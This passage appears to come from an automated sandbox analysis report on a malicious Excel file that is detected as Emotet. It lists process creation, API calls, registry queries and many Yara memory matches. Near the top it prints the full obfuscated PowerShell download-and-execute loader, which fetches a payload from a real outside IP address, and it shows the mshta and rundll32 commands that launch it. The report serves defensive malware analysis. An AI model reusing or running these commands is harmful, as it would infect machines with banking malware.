                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgSJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkKJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVCJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: 2022-28-01_1202.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a50000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2960000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3c0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b40000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30f0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.430000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2290000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2270000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30c0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.990000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.960000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f90000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2960000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.960000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a20000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d20000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b40000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3c0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ae0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ea0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ea0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.29f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2290000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3120000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.520000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e70000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c90000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22e0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ab0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2260000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c40000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a20000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2ee0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d20000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c90000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f30000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2270000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3100000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3100000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ae0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.920000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
